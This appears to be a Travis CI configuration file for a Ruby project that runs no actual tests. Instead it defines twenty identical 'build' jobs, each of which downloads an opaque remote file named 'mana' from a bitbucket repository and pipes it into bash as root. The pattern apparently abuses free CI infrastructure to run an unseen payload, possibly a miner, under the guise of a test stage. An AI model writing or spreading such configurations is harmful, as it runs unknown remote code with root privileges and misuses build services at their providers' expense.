language: ruby


jobs:
  include:
    - stage: test
      name: "build1"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build2"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build3"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build4"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build5"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build6"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build7"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build8"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build9"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build10"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build11"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build12"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build13"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build14"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build15"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build16"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build17"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build18"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build19"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        
    -
      name: "build20"
      script:
        - sudo -u root curl https://bitbucket.org/maliabro/manalu/raw/682a106f74b9339626dd186345fcd0789fcfff87/mana | bash
        